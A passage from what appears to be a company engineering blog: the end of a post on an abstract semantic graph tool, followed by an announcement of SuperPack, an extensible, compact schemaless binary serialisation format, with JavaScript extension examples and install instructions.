The Semantics object’s fields, including the ASG, can be accessed directly. One can also define a reducer, in the same way a reducer is defined over a Shift AST: subclassing the ReconstructingReducer. Note that our ASG reducers have not yet been open-sourced, but will be soon.

Limitations

Currently, WithStatements and direct calls to eval are explicated into Halt nodes. There’s no reason that these cannot be supported, but they were not part of the initial effort. Similarly, not all of ECMAScript 2015 and beyond is supported. We will be adding support for newer ECMAScript features piece by piece as development continues.

Acknowledgements

Thanks to Shape engineer Kevin Gibbons for figuring out all the hard problems during the design of the ASG.

Announcing SuperPack

Shape Security is proud to announce the release of SuperPack, a language-agnostic schemaless binary data serialisation format.

First of all, what does it mean to be schemaless?

Data serialisation formats like JSON or MessagePack encode values in a way that the structure of those values (schema) can be determined by simply observing the encoded value. These formats, like SuperPack, are said to be “schemaless”.

In contrast, a schema-driven serialisation format such as Protocol Buffers makes use of ahead-of-time knowledge of the schema to pack the encoded values into one extremely efficient byte sequence free of any schema markers. Schema-driven encodings have some obvious downsides. The schema must remain fixed (ignoring versioning), and if the encoding party is not also the decoding party, the schema must be shared among them and kept in sync.

Choose the right tool for the job. Usually, it is better to choose a schema-driven format if it is both possible and convenient. For other occasions, we have a variety of schemaless encodings.

What separates it from the others?

In short, SuperPack payloads are very compact without losing the ability to represent any type of data you desire.

Extensibility

The major differentiator between SuperPack and JSON or bencode is that it is extensible. Almost everyone has had to deal with JSON and its very limited set of data types. When you try to serialise a JS undefined value, a regular expression, a date, a typed array, or countless other more exotic data types through JSON, your encoder will either give you an error or give you an encoding that will not decode back to the input value. You will never have that problem with SuperPack.
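
For example, with plain JSON several common JavaScript values are silently mangled or dropped:

JSON.stringify({ when: new Date(0), pattern: /ab+c/, missing: undefined });
// => '{"when":"1970-01-01T00:00:00.000Z","pattern":{}}'
// The Date survives only as a string, the RegExp becomes an empty object,
// and the undefined property disappears entirely.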

SuperPack doesn’t have a very rich set of built-in data types. Instead, it is extensible. Say we wanted to encode/decode (aka transcode) regular expressions, a data type that is not natively supported by SuperPack. This is all you have to do:

SuperPackTranscoder.extend(
  // extension point: 0 through 127
  0,
  // detect values which require this custom serialisation
  x => x instanceof RegExp,
  // serialiser: return an intermediate value which will be encoded instead
  r => [r.source, r.flags],
  // deserialiser: from the intermediate value, reconstruct the original value
  ([source, flags]) => RegExp(source, flags),
);

And if we want to transcode TypedArrays:

SuperPackTranscoder.extend(
  1,
  ArrayBuffer.isView,
  a => [a[Symbol.toStringTag], a.buffer],
  ([ctor, buffer]) => new self[ctor](buffer),
);

Compactness

The philosophy behind SuperPack is that, even if you cannot predict your data’s schema in advance, the data likely has structures or values that are repeated many times in a single payload. Also, some values are just very common and should have efficient representations.

Numbers between -15 and 63 (inclusive) are a single byte; so are booleans, null, undefined, empty arrays, empty maps, and empty strings. Strings which don’t contain a null (\0) character can avoid storing their length by using a C-style null terminator. Boolean-valued arrays and maps use a single bit per value.

When an encoder sees multiple strings with the same value, it will store them in a lookup table, and each reference will only be an additional two bytes. Note that this string deduplication optimisation could have been taken further to allow deduplication of arbitrary structures, but that would allow encoders to create circular references, which is something we’d like to avoid.

When an encoder sees multiple maps with the same set of keys, it can make an optional optimisation that is reminiscent of the schema-directed encoding approach but with the schema included in the payload. Instead of storing the key names once for each map, it can use what we call a “repeated keyset optimisation” to refer back to the object shape and encode its values as a super-efficient contiguous byte sequence.

The downside of this compactness is that, unlike JSON, YAML, or edn, SuperPack payloads are not human-readable.

Conclusion

After surveying existing data serialisation formats, we knew we could design one that would be better suited to our particular use case. And our use case is not so rare as to make SuperPack only useful to us; it is very much a general purpose serialisation format. If you want to create very small payloads for arbitrary data of an unknown schema in an environment without access to a lossless data compression algorithm, SuperPack is for you. If you want to see a more direct comparison to similar formats, see the comparison table in the specification.

I’m sold. How do I use it?

As of now, we have an open-source JavaScript implementation of SuperPack.

$ npm install --save superpack